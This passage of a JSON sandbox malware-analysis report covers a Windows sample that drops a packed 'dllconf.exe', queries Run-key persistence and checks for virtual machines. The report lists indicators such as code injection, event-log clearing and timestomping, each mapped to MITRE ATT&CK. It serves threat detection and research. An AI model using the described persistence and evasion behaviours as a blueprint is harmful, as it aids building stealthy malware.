\"cmd.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2585.bat\"\n \"cmd.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\R2585.BAT\"\n \"cmd.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2908.bat\"\n \"cmd.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\R2908.BAT\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" writes file \"c:\\dllconf.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"dllconf.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"dllconf.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"dllconf.exe\" touched file \"C:\\Windows\\System32\\dllconf.exe\"\n \"dllconf.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"dllconf.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"dllconf.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"dllconf.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\dllconf.exe]- [targetUID: 00000000-00005056]\n \"dllconf.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [C:\\dllconf.exe]- [targetUID: 00000000-00005056]\n \"r2585.bat\" has type \"DOS batch file ASCII text with CRLF line terminators\"- Location: [%TEMP%\\r2585.bat]- [targetUID: 00000000-00005056]\n \"r2908.bat\" has type \"DOS batch file ASCII text with CRLF line terminators\"- Location: [%TEMP%\\r2908.bat]- [targetUID: 00000000-00005068]\n \"DLLCONF.EXE.67A9C384.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" connecting to \"\\ThemeApiPort\"\n \"dllconf.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"E7379A48E702C96FA733625CF8535F1A1A9C6704941224A7B5ECB18D8E0FED33\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CONNECT\"; Key: \"VALUENAME\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"DRIVELOAD32\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"DRIVELOAD32\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"MAXRPCSIZE\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"CEIPENABLE\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"SYNCMODE5\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\5.0\\CACHE\"; Key: \"SESSIONSTARTTIMEDEFAULTDELTASECS\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\"; Key: \"CATEGORY\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Able to identify virtual/sandbox environment\n Matched sigs: Able to identify virtual environment by using user activity (API string)\n Matched sigs: Contains ability to retrieve the time elapsed since the system was started (API string)\n Matched sigs: Able to identify virtual environment using sandbox registry", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-306", "type": 2, "relevance": 1, "name": "Contains ability to impersonate access tokens (API string)", "description": "Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcessToken\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcessToken\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-192", "type": 2, "relevance": 1, "name": "Contains ability to modify system service (API string)", "description": "Found reference to API \"ControlService\" (Indicator: \"ControlService\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"ControlService\" (Indicator: \"ControlService\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-318", "type": 2, "relevance": 1, "name": "Contains ability to load/free library (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-304", "type": 2, "relevance": 1, "name": "Contains ability to modify registry key/value (API string)", "description": "Found reference to API \"RegSetValueExA\" (Indicator: \"RegSetValue\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"RegSetValueExA\" (Indicator: \"RegSetValue\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-211", "type": 2, "relevance": 1, "name": "Contains ability to delete all entries from an event log (API string)", "description": "Found reference to API \"ClearEventLogA\" (Indicator: \"ClearEventLog\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"ClearEventLogA\" (Indicator: \"ClearEventLog\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-544", "type": 2, "relevance": 1, "name": "Contains ability to open a service (API string)", "description": "Found reference to API \"OpenServiceA\" (Indicator: \"OpenService\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"OpenServiceA\" (Indicator: \"OpenService\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-409", "type": 2, "relevance": 1, "name": "Contains ability to set file time (API string)", "description": "Found reference to API \"SetFileTime\" (Indicator: \"SetFileTime\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"SetFileTime\" (Indicator: \"SetFileTime\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-92", "type": 2, "relevance": 1, "name": "Contains ability to inject code into another process (API string)", "description": "Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")\n \"dllconf.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-145", "type": 2, "relevance": 1, "name": "Found virtual disk drive like strings", "description": "Found string - \\\\.\\NTICE; Source: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string - \\\\.\\NTICE; Source: \"00000000-00005056.00000000.139963.00423000.00000040.mdmp\")\n Found string - \\\\.\\NTICE; Source: \"00000000-00005068.00000000.140099.00423000.00000040.mdmp, 00000000-00005068.00000001.140461.00423000.00000040.mdmp\")\n Found string - \\\\.\\NTICE; Source: \"00000000-00005392.00000000.140409.00423000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-183", "type": 2, "relevance": 1, "name": "Contains ability to check debugger is running (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-148", "type": 2, "relevance": 1, "name": "Contains ability to register a top-level exception handler (API string)", "description": "Found reference to API \"UnhandledExceptionFilter\" (Indicator: \"UnhandledExceptionFilter\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-249", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file time (API string)", "description": "Found reference to API \"GetFileTime\" (Indicator: \"GetFileTime\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetFileTime\" (Indicator: \"GetFileTime\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-171", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the OS information (API string)", "description": "Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetVersion\" (Indicator: \"GetVersion\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"GetVersion\" (Indicator: \"GetVersion\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"670419874,1712,3024,,RtlGetVersion,NTDLL.dll,\"252:22:00.915\",RX=0,PX=0\" (Indicator: \"GetVersion\"; Source: \"00000000-00005392.00000000.140409.00640000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-312", "type": 2, "relevance": 1, "name": "Contains ability to retrieve path in which Windows is installed (API string)", "description": "Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-141", "type": 2, "relevance": 1, "name": "Contains ability to retrieve open application windows (API string)", "description": "Found reference to API \"GetForegroundWindow\" (Indicator: \"GetForegroundWindow\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"EnumWindows\" (Indicator: \"EnumWindows\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetWindowTextA\" (Indicator: \"GetWindowText\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetActiveWindow\" (Indicator: \"GetActiveWindow\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetActiveWindow\" (Indicator: \"GetActiveWindow\"; Source: \"00000000-00005056.00000000.139963.0041A000.00000040.mdmp\")\n Found reference to API \"GetWindowTextA\" (Indicator: \"GetWindowText\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"GetForegroundWindow\" (Indicator: \"GetForegroundWindow\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"EnumWindows\" (Indicator: \"EnumWindows\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"11861984953,5108,110,,EnumWindows,user32.dll,\"252:21:57.873\",RX=0,PX=0\" (Indicator: \"EnumWindows\"; Source: \"00000000-00005056.00000000.139963.00640000.00000004.mdmp\")\n Found reference to API \"8764322733,5108,108,,GetWindowTextA,user32.dll,\"252:21:56.578\",RX=0,PX=0\" (Indicator: \"GetWindowText\"; Source: \"00000000-00005056.00000000.139963.00640000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-351", "type": 2, "relevance": 1, "name": "Found registry location string related to processor", "description": "Observed string: \"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\" (Indicator: \"hardware\\description\\system\\centralprocessor\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n Observed string: \"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\" (Indicator: \"hardware\\description\\system\\centralprocessor\") in Source: 00000000-00005068.00000001.140461.0041B000.00000080.mdmp", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-660", "type": 2, "relevance": 1, "name": "Able to identify virtual/sandbox environment", "description": "Found string \"vboxguestadditions\" (Indicator: \"VBoxGuest\"; Source: \"00000000-00005056.00000001.140381.00640000.00000004.mdmp\")\n Found string \"vboxguestadditions\" (Indicator: \"VBoxGuest\"; Source: \"00000000-00005068.00000001.140461.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-365", "type": 2, "relevance": 1, "name": "Contains ability to perform scheduled transfer (API string)", "description": "Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetLocalTime\" (Indicator: \"GetLocalTime\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetLocalTime\" (Indicator: \"GetLocalTime\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-247", "type": 2, "relevance": 1, "name": "Contains ability to retrieve machine time (API string)", "description": "Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetLocalTime\" (Indicator: \"GetLocalTime\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetLocalTime\" (Indicator: \"GetLocalTime\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-248", "type": 2, "relevance": 1, "name": "Contains ability to retrieve machine timezone (API string)", "description": "Found reference to API \"GetTimeZoneInformation\" (Indicator: \"GetTimeZoneInformation\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetTimeZoneInformation\" (Indicator: \"GetTimeZoneInformation\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb6777086a6a000030fd7f9a5cc87700f0fd7f18b812004430fd7f00000000400000003f000000210000000030fd7f0cb81200c15cc8776082cf77210000000030fd7f9a5cc87700f0fd7f30b812005789c7778083cf771317ce75d8eb6777 (UID: 00000000-00005056)\n \"dllconf.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb6777409f2d000040fd7f9a5cc87700f0fd7f18b812004440fd7f00000000400000003f000000210000000040fd7f0cb81200c15cc8776082cf77210000000040fd7f9a5cc87700f0fd7f30b812005789c7778083cf771317ce75d8eb6777 (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005068)\n \"dllconf.exe\" called 